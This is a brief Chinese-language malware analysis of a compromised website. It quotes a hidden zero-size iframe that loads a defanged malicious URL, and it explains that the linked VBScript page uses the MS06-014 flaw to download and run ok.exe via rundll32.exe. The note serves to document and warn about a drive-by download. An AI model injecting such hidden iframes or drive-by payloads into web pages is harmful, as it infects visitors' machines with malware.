网站包含代码:
/---
<iframe src="hxxp://he*i*dian*.go2.i**cp*c*n.com/wo/tzd.htm" name="zhu" width="0"height="0" frameborder="0">
---/
hxxp://he*i*dian*.go2.i**cp*c*n.com/wo/tzd.htm 是个以 VBScript 为脚本的ASP网页,输出VBScript脚本。
该脚本利用 MS06-014漏洞下载 hxxp://he*i*dian*.go2.i**cp*c*n.com/ok.exe,通过rundll32.exe来启动。